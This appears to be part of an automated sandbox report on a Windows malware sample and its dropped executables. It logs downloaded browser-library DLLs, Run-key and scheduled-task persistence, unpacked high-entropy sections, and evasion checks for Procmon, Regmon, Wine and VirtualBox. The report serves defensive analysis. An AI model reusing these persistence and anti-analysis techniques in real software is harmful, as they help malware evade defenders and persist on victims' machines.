Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 20.2.axplong.exe.3d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zywzqxul:EW;dpxiwhce:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zywzqxul:EW;dpxiwhce:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Unpacked PE file: 21.2.9fa327eb6c.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.fufuc:R;.xixeray:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Unpacked PE file: 24.2.8e8f4571c5.exe.560000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:R;Unknown_Section6:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;.rsrc:R;Unknown_Section6:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Unpacked PE file: 25.2.9fa327eb6c.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.fufuc:R;.xixeray:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Unpacked PE file: 28.2.8e8f4571c5.exe.560000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:R;Unknown_Section6:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;.rsrc:R;Unknown_Section6:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Unpacked PE file: 34.2.9fa327eb6c.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.fufuc:R;.xixeray:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Unpacked PE file: 21.2.9fa327eb6c.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Unpacked PE file: 25.2.9fa327eb6c.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Unpacked PE file: 34.2.9fa327eb6c.exe.400000.0.unpack
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004195E0
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: explorti.exe.5.dr Static PE information: real checksum: 0x1d6c1b should be: 0x1d643b
Source: userAAKKKEBFCG.exe.0.dr Static PE information: real checksum: 0x1e81e4 should be: 0x1dcf01
Source: RoamingIJEGHJECFC.exe.0.dr Static PE information: real checksum: 0x1d6c1b should be: 0x1d643b
Source: axplong.exe.8.dr Static PE information: real checksum: 0x1e81e4 should be: 0x1dcf01
Source: random[1].exe.0.dr Static PE information: real checksum: 0x1d6c1b should be: 0x1d643b
Source: file.exe Static PE information: section name: .fufuc
Source: file.exe Static PE information: section name: .xixeray
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: hoxupgqj
Source: random[1].exe.0.dr Static PE information: section name: fapapsdz
Source: random[1].exe.0.dr Static PE information: section name: .taggant
Source: RoamingIJEGHJECFC.exe.0.dr Static PE information: section name:
Source: RoamingIJEGHJECFC.exe.0.dr Static PE information: section name: .idata
Source: RoamingIJEGHJECFC.exe.0.dr Static PE information: section name:
Source: RoamingIJEGHJECFC.exe.0.dr Static PE information: section name: hoxupgqj
Source: RoamingIJEGHJECFC.exe.0.dr Static PE information: section name: fapapsdz
Source: RoamingIJEGHJECFC.exe.0.dr Static PE information: section name: .taggant
Source: userAAKKKEBFCG.exe.0.dr Static PE information: section name:
Source: userAAKKKEBFCG.exe.0.dr Static PE information: section name: .idata
Source: userAAKKKEBFCG.exe.0.dr Static PE information: section name:
Source: userAAKKKEBFCG.exe.0.dr Static PE information: section name: zywzqxul
Source: userAAKKKEBFCG.exe.0.dr Static PE information: section name: dpxiwhce
Source: userAAKKKEBFCG.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe0.0.dr Static PE information: section name: .fufuc
Source: random[1].exe0.0.dr Static PE information: section name: .xixeray
Source: explorti.exe.5.dr Static PE information: section name:
Source: explorti.exe.5.dr Static PE information: section name: .idata
Source: explorti.exe.5.dr Static PE information: section name:
Source: explorti.exe.5.dr Static PE information: section name: hoxupgqj
Source: explorti.exe.5.dr Static PE information: section name: fapapsdz
Source: explorti.exe.5.dr Static PE information: section name: .taggant
Source: axplong.exe.8.dr Static PE information: section name:
Source: axplong.exe.8.dr Static PE information: section name: .idata
Source: axplong.exe.8.dr Static PE information: section name:
Source: axplong.exe.8.dr Static PE information: section name: zywzqxul
Source: axplong.exe.8.dr Static PE information: section name: dpxiwhce
Source: axplong.exe.8.dr Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041A9F5 push ecx; ret 0_2_0041AA08
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C70B536 push ecx; ret 0_2_6C70B549
Source: file.exe Static PE information: section name: .text entropy: 7.823258879693632
Source: random[1].exe.0.dr Static PE information: section name: entropy: 7.983843219488176
Source: random[1].exe.0.dr Static PE information: section name: hoxupgqj entropy: 7.954054233377559
Source: RoamingIJEGHJECFC.exe.0.dr Static PE information: section name: entropy: 7.983843219488176
Source: RoamingIJEGHJECFC.exe.0.dr Static PE information: section name: hoxupgqj entropy: 7.954054233377559
Source: userAAKKKEBFCG.exe.0.dr Static PE information: section name: entropy: 7.984877598028932
Source: userAAKKKEBFCG.exe.0.dr Static PE information: section name: zywzqxul entropy: 7.955124114552355
Source: random[1].exe0.0.dr Static PE information: section name: .text entropy: 7.823258879693632
Source: explorti.exe.5.dr Static PE information: section name: entropy: 7.983843219488176
Source: explorti.exe.5.dr Static PE information: section name: hoxupgqj entropy: 7.954054233377559
Source: axplong.exe.8.dr Static PE information: section name: entropy: 7.984877598028932
Source: axplong.exe.8.dr Static PE information: section name: zywzqxul entropy: 7.955124114552355
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\userAAKKKEBFCG.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\userAAKKKEBFCG.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\RoamingIJEGHJECFC.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8e8f4571c5.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9fa327eb6c.exe
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\userAAKKKEBFCG.exe Window searched: window name: FilemonClass
Source: C:\Users\userAAKKKEBFCG.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\userAAKKKEBFCG.exe Window searched: window name: RegmonClass
Source: C:\Users\userAAKKKEBFCG.exe Window searched: window name: FilemonClass
Source: C:\Users\userAAKKKEBFCG.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe File created: C:\Windows\Tasks\explorti.job
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9fa327eb6c.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9fa327eb6c.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8e8f4571c5.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8e8f4571c5.exe
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004195E0
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userAAKKKEBFCG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (46 identical entries)
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (39 identical entries)
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (39 identical entries)

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\userAAKKKEBFCG.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\userAAKKKEBFCG.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
